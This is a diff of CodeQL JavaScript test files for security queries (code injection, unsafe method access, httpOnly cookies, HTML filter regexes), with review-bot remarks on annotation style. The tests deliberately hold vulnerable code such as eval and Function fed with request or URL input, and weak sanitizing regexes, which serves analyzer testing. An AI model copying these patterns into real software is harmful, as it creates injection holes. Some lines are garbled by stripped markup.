express = require('express'); 
@@ -49,7 +49,7 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // NOT - the source is remote-flow, but we know of no sink. + var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // $ Alert[js/bad-code-sanitization] - the source is remote-flow, but we know of no sink. setTimeout(`(function(){${JSON.stringify(req.param("wobble"))}))`); // OK - the source is remote-flow, and the sink is code-injection. @@ -61,7 +61,7 @@ app.get('/some/path', function(req, res) { // Bad documentation example: function createObjectWrite() { const assignment = `obj[${JSON.stringify(key)}]=42`; - return `(function(){${assignment}})` // NOT OK + return `(function(){${assignment}})` // $ Alert[js/bad-code-sanitization] } // Good documentation example: @@ -87,6 +87,6 @@ function good() { function createObjectWrite() { const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`; - return `(function(){${assignment}})` // OK + return `(function(){${assignment}})` } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js index 3a5abba84c03..58e67741a8c5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js 
@@ -3,30 +3,23 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // NOT OK - var f = new Function("return wibbles[" + req.param("wobble") + "];"); - // NOT OK - require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); + var f = new Function("return wibbles[" + req.param("wobble") + "];"); // $ Alert + require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); // $ Alert var runC = require("vm").runInNewContext; - // NOT OK - runC("return wibbles[" + req.param("wobble") + "];"); + runC("return wibbles[" + req.param("wobble") + "];"); // $ Alert var vm = require("vm"); - // NOT OK - vm.compileFunction(req.param("code_compileFunction")); - // NOT OK - var script = new vm.Script(req.param("code_Script")); - // NOT OK - var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); - // NOT OK - vm.runInContext(req.param("code_runInContext"), vm.createContext()); + vm.compileFunction(req.param("code_compileFunction")); // $ Alert + var script = new vm.Script(req.param("code_Script")); // $ Alert + var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); // $ Alert + vm.runInContext(req.param("code_runInContext"), vm.createContext()); // $ Alert }); const cp = require('child_process'); app.get('/other/path', function(req, res) { const taint = req.param("wobble"); - cp.execFileSync('node', ['-e', taint]); // NOT OK + cp.execFileSync('node', ['-e', taint]); // $ Alert[js/code-injection] - cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK + cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); }); const pty = require('node-pty'); 
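Review bot: Within the same express.js handler the new expectation comments mix bare `$ Alert` (the `new Function`, `runInThisContext`, `runC` and `vm.*` lines) with `$ Alert[js/code-injection]` (the `cp.execFileSync` line), so a reader cannot tell from the untagged lines which query is expected to report them; presumably the bare form is used where more than one query in this test directory fires, but nothing on the page says so. A short comment on the first untagged line, `// $ Alert - untagged: reported by more than one query in this directory`, or tagging every line with its query id, would make the expectations self-explanatory. The same mixture appears in lib/index.js (the `Template.prototype.compile` and both `doesTaint` hunks) and in tst.js (bare `$ Alert` at top level versus `$ Alert[js/code-injection]` inside `test()`).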
@@ -40,13 +33,13 @@ app.get('/terminal', function(req, res) { env: process.env }); - shell.write(taint); // NOT OK + shell.write(taint); // $ Alert[js/code-injection] }); require("express-ws")(app); app.ws("/socket-thing/", function (ws, req) { ws.on("message", function (msg) { - eval(msg); // NOT OK + eval(msg); // $ Alert[js/code-injection] }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 9df334c56dc1..dbb715dfd7a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -1,17 +1,17 @@ export function unsafeDeserialize(data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } export function unsafeGetter(obj, name) { - return eval("obj." + name); // NOT OK + return eval("obj." + name); // $ Alert[js/unsafe-code-construction] } export function safeAssignment(obj, value) { - eval("obj.foo = " + JSON.stringify(value)); // OK + eval("obj.foo = " + JSON.stringify(value)); } global.unsafeDeserialize = function (data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } const matter = require("gray-matter"); @@ -25,7 +25,7 @@ export function greySink(data) { const res = matter(str); console.log(res); - matter(str, { // OK + matter(str, { engines: { js: function (data) { console.log("NOPE"); @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // NOT OK + eval(" var " + opts.varName + " = something();"); // $ Alert }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { 
@@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js index 64eeea78f2f1..18885dd25577 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js 
@@ -6,7 +6,7 @@ var app = express();
 app.get('/some/path', function (req, res) {
 let filename = req.query.filename;
 var m = new Module(filename, module.parent);
- m._compile(req.query.code, filename); // NOT OK
+ m._compile(req.query.code, filename); // $ Alert[js/code-injection]
 var m2 = new module.constructor;
- m2._compile(req.query.code, filename); // NOT OK
+ m2._compile(req.query.code, filename); // $ Alert[js/code-injection]
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js
index 0a9edc1ebe9c..9c11b511aa27 100644
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js
@@ -5,7 +5,7 @@ var app = express();
 app.get('/some/path', function(req, res) {
 let tainted = req.param("code");
- ; // NOT OK
+ ; // $ Alert[js/code-injection]
 let wv = ;
- wv.injectJavaScript(tainted); // NOT OK
+ wv.injectJavaScript(tainted); // $ Alert[js/code-injection]
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js
index 51554663e4ee..d85b45e076f7 100644
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js
@@ -17,18 +17,18 @@ var app = express();
 app.get('/some/path', function (req, res) {
 let tainted = req.query.foo;
- pug.compile(tainted); // NOT OK
- pug.render(tainted); // NOT OK
- jade.compile(tainted); // NOT OK
- jade.render(tainted); // NOT OK
- dot.template(tainted); // NOT OK
- ejs.render(tainted); // NOT OK
- nunjucks.renderString(tainted); // NOT OK
- lodash.template(tainted); // NOT OK
- dot.compile(tainted); // NOT OK
- handlebars.compile(tainted); // NOT OK
- mustache.render(tainted); // NOT OK
- Hogan.compile(tainted); // NOT OK
- Eta.render(tainted); // NOT OK
- Sqrl.render(tainted); // NOT OK
+ pug.compile(tainted); // $ Alert[js/code-injection]
+ pug.render(tainted); // $ Alert[js/code-injection]
+ jade.compile(tainted); // $ Alert[js/code-injection]
+ jade.render(tainted); // $ Alert[js/code-injection]
+ dot.template(tainted); // $ Alert[js/code-injection]
+ ejs.render(tainted); // $ Alert[js/code-injection]
+ nunjucks.renderString(tainted); // $ Alert[js/code-injection]
+ lodash.template(tainted); // $ Alert[js/code-injection]
+ dot.compile(tainted); // $ Alert[js/code-injection]
+ handlebars.compile(tainted); // $ Alert[js/code-injection]
+ mustache.render(tainted); // $ Alert[js/code-injection]
+ Hogan.compile(tainted); // $ Alert[js/code-injection]
+ Eta.render(tainted); // $ Alert[js/code-injection]
+ Sqrl.render(tainted); // $ Alert[js/code-injection]
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js
index 5b51da5daf26..0e35c7529112 100644
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js
@@ -1,38 +1,31 @@ -// NOT OK -eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) +eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) // $ Alert + +setTimeout(document.location.hash); // $ Alert -// NOT OK -setTimeout(document.location.hash); -// OK setTimeout(document.location.protocol); -// OK + $('. ' + document.location.hostname); -// NOT OK -Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); +Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); // $ Alert -// NOT OK -WebAssembly.compile(document.location.hash); +WebAssembly.compile(document.location.hash); // $ Alert -// NOT OK -WebAssembly.compileStreaming(document.location.hash); +WebAssembly.compileStreaming(document.location.hash); // $ Alert -// NOT OK -eval(atob(document.location.hash.substring(1))); +eval(atob(document.location.hash.substring(1))); // $ Alert -// NOT OK -$('').attr("onclick", location.search.substring(1)); +$('').attr("onclick", location.search.substring(1)); // $ Alert (function test() { var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); - new Function(source); // NOT OK + new Function(source); // $ Alert[js/code-injection] - Function(source); // NOT OK + Function(source); // $ Alert[js/code-injection] - new Function("a", "b", source); // NOT OK + new Function("a", "b", source); // $ Alert[js/code-injection] - new Function(...["a", "b"], source); // NOT OK + new Function(...["a", "b"], source); // $ Alert[js/code-injection] })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html index 3f62fd326211..1d2014837d27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html 
@@ -1,6 +1,6 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js index 00fb98af9675..e9cb0a8b755c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js @@ -1,5 +1,5 @@ import * as webix from 'webix'; -webix.exec(document.location.hash); // NOT OK -webix.ui({ template: document.location.hash }); // NOT OK -webix.ui({ template: function () { return document.location.hash } }); // NOT OK \ No newline at end of file +webix.exec(document.location.hash); // $ Alert[js/code-injection] +webix.ui({ template: document.location.hash }); // $ Alert[js/code-injection] +webix.ui({ template: function () { return document.location.hash } }); // $ Alert[js/code-injection] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js index 8ffd5a8addda..7c97f134bc90 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js @@ -10,5 +10,5 @@ window.addEventListener("message", (ev) => { let message = JSON.parse(ev.data); // Let the parent frame call the 'play' or 'pause' function - window[message.name](message.payload); // NOT OK + window[message.name](message.payload); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js index 2119fa97ed23..a5c32b914c70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js @@ -2,21 +2,21 @@ let obj = {}; window.addEventListener('message', (ev) => { let message = JSON.parse(ev.data); - window[message.name](message.payload); // NOT OK - may invoke eval - new window[message.name](message.payload); // NOT OK - may invoke jQuery $ function or similar + window[message.name](message.payload); // $ Alert - may invoke eval + new window[message.name](message.payload); // $ Alert - may invoke jQuery $ function or similar window["HTMLElement" + message.name](message.payload); // OK - concatenation restricts choice of methods window[`HTMLElement${message.name}`](message.payload); // OK - concatenation restricts choice of methods function f() {} - f[message.name](message.payload)(); // NOT OK - may acccess Function constructor + f[message.name](message.payload)(); // $ Alert - may acccess Function constructor obj[message.name](message.payload); // OK - may crash, but no code execution involved - window[ev](ev); // NOT OK + window[ev](ev); // $ Alert window[configData() + ' ' + message.name](message.payload); // OK - concatenation restricts choice of methods window[configData() + message.name](message.payload); // OK - concatenation restricts choice of methods - window['' + message.name](message.payload); // NOT OK - coercion does not restrict choice of methods + window['' + message.name](message.payload); // $ Alert - coercion does not restrict choice of methods }); diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js index b91f82c781f2..492990b49082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js +++ b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js 
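Review bot: The rewritten annotation on the `f[message.name]` line carries the old typo forward: `f[message.name](message.payload)(); // $ Alert - may acccess Function constructor`. The free text after `$ Alert -` does not affect expectation matching, but since the line is already being rewritten this is the moment to make it `// $ Alert - may access Function constructor`.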
@@ -5,19 +5,19 @@ const session = require('cookie-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: true, // GOOD + httpOnly: true, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: false // BAD + httpOnly: false // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - secure: true // GOOD, httpOnly is true by default + secure: true // OK - httpOnly is true by default })) var sess = { @@ -26,7 +26,7 @@ var sess = { } sess.httpOnly = false; -app.use(session(sess)) // BAD +app.use(session(sess)) // $ Alert var sess2 = { name: 'session', @@ -35,7 +35,7 @@ var sess2 = { } sess2.httpOnly = false; -app.use(session(sess2)) // BAD +app.use(session(sess2)) // $ Alert var sess3 = { name: 'mycookie', @@ -44,21 +44,21 @@ var sess3 = { } sess3.httpOnly = false; -app.use(session(sess3)) // BAD, It is a session cookie, name doesn't matter +app.use(session(sess3)) // $ Alert - It is a session cookie, name doesn't matter var flag = false var flag2 = flag app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: flag2 // BAD + httpOnly: flag2 // $ Alert })) app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false }); res.end('ok') @@ -68,7 +68,7 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false }); res.end('ok') @@ -79,13 +79,13 @@ app.get('/a', function (req, res, next) { { maxAge: 9000000000 }); - res.end('ok') // BAD + res.end('ok') // $ Alert }) app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false } res.cookie('authkey', 'value', options); 
@@ -95,7 +95,7 @@ app.get('/a', function (req, res, next) { app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false } res.cookie('authkey', 'value', options); @@ -106,7 +106,7 @@ app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000 } - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -115,7 +115,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -124,7 +124,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -134,7 +134,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -145,7 +145,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let authKey = "blabla" - res.cookie(authKey, 'value', options); // BAD, var name likely auth related + res.cookie(authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -156,7 +156,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let o = { authKey: "blabla" } - res.cookie(o.authKey, 'value', options); // BAD, var name likely auth related + res.cookie(o.authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) 
@@ -167,7 +167,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let blabla = "authKey" - res.cookie(blabla, 'value', options); // BAD, var name likely auth related + res.cookie(blabla, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -177,7 +177,7 @@ app.get('/a', function (req, res, next) { httpOnly: true, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -187,7 +187,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -196,7 +196,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000, httpOnly: false, } - res.cookie('mycookie', 'value', options); // GOOD, name likely is not auth sensitive + res.cookie('mycookie', 'value', options); // OK - name likely is not auth sensitive res.end('ok') }) @@ -205,8 +205,7 @@ const http = require('http'); function test1() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", "authKey=ninja"); + res.setHeader("Set-Cookie", "authKey=ninja"); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -215,7 +214,7 @@ function test1() { function test2() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", "auth=ninja; HttpOnly"); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); 
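Review bot: In test2 the `// GOOD` comment is replaced by an empty added line rather than deleted, which appears to leave a stray blank line between the Content-Type and Set-Cookie `setHeader` calls; the test4 hunk on the next line does the same. test5 and test7 in this file instead keep an `// OK - …` annotation on the safe case. Either drop the line outright or keep e.g. `// OK - HttpOnly attribute set` so the safe cases stay self-documenting and the helpers in this file stay consistent.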
@@ -225,8 +224,7 @@ function test2() { function test3() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); + res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -235,7 +233,7 @@ function test3() { function test4() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", ["auth=ninja; HttpOnly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -245,7 +243,7 @@ function test4() { function test5() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD, case insensitive + // OK - case insensitive res.setHeader("Set-Cookie", ["auth=ninja; httponly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -265,7 +263,7 @@ function test6() { function test7() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // Good, not auth related + // OK - not auth related res.setHeader("Set-Cookie", ["foo=ninja", "bar=javascript"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -276,7 +274,7 @@ function test8() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; httponly" - res.setHeader("Set-Cookie", `session=ninja ${attr}`); // Good, httponly string expression + res.setHeader("Set-Cookie", `session=ninja ${attr}`); // OK - httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); 
@@ -286,7 +284,7 @@ function test9() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; secure" - res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // Bad, not httponly string expression + res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // $ Alert - not httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -297,22 +295,22 @@ const session = require('express-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: true }, // GOOD + cookie: { httpOnly: true }, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD + cookie: { httpOnly: false } // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { secure: true } // GOOD, httpOnly is true by default + cookie: { secure: true } // OK - httpOnly is true by default })) -app.use(session({ // GOOD, httpOnly is true by default +app.use(session({ // OK - httpOnly is true by default name: 'session', keys: ['key1', 'key2'] })) @@ -320,14 +318,14 @@ app.use(session({ // GOOD, httpOnly is true by default app.use(session({ name: 'mycookie', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD, It is a session cookie, name doesn't matter + cookie: { httpOnly: false } // $ Alert - It is a session cookie, name doesn't matter })) const http = require('http'); function test10() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // BAD + res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 5b294adae1b7..5fdc3b0c798e 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js @@ -1,25 +1,25 @@ var filters = [ - /.*?<\/script>/i, // NOT OK - doesn't match newlines or `` - /.*?<\/script>/is, // NOT OK - doesn't match `` - /.*?<\/script[^>]*>/is, // OK + /.*?<\/script>/i, // $ Alert - doesn't match newlines or `` + /.*?<\/script>/is, // $ Alert - doesn't match `` + /.*?<\/script[^>]*>/is, //is, // OK - we don't care regexps that only match comments - /)|([^\/\s>]+)[\S\s]*?>/, // NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // NOT OK - capture groups - /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // NOT OK - capture groups - /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // NOT OK - capture groups - /|<([^>]*?)>/g, // NOT OK - capture groups + /)|([^\/\s>]+)[\S\s]*?>/, // $ Alert - doesn't match comments with the right capture groups + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // $ Alert - capture groups + /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // $ Alert - capture groups + /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // $ Alert - capture groups + /|<([^>]*?)>/g, // $ Alert - capture groups ] doFilters(filters) 
@@ -28,8 +28,8 @@ var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used w new RegExp(strip, 'gi'); var moreFilters = [ - /-->/g, // NOT OK - doesn't match --!> - /^>|^->||--!>|/g, // $ Alert - doesn't match --!> + /^>|^->||--!>|\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // $ Alert // lib2 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // $ Alert // lib3 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // $ Alert - html.replace(defaultPattern, expanded); // NOT OK + html.replace(defaultPattern, expanded); // $ Alert function getPattern() { return defaultPattern; } - html.replace(getPattern(), expanded); // NOT OK + html.replace(getPattern(), expanded); // $ Alert function getExpanded() { return expanded; } - html.replace(defaultPattern, getExpanded()); // NOT OK (but not tracking the expansion string) - html.replace(defaultPattern, something); // OK (possibly) - defaultPattern.match(something); // OK (possibly) - getPattern().match(something); // OK (possibly) + html.replace(defaultPattern, getExpanded()); // MISSING: Alert - not tracking the expansion string + html.replace(defaultPattern, something); // OK - possibly + defaultPattern.match(something); // OK - possibly + getPattern().match(something); // OK - possibly }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js index 2c31e247bf22..680535452194 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js @@ -1,14 +1,14 @@ // CVE-2019-10756 (function(content) { - content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // NOT OK - content = content.replace(/ on\w+=".*"/g, ""); // NOT OK - content = content.replace(/ on\w+=\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // $ Alert + content = content.replace(/ on\w+=".*"/g, ""); // $ Alert + content = content.replace(/ on\w+=\'.*\'/g, ""); // $ Alert return content; }); (function(content) { - content = content.replace(/<.*cript.*/gi, ""); // NOT OK - content = content.replace(/.on\w+=.*".*"/g, ""); // NOT OK - content = content.replace(/.on\w+=.*\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*/gi, ""); // $ Alert + content = content.replace(/.on\w+=.*".*"/g, ""); // $ Alert + content = content.replace(/.on\w+=.*\'.*\'/g, ""); // $ Alert return content; }); 
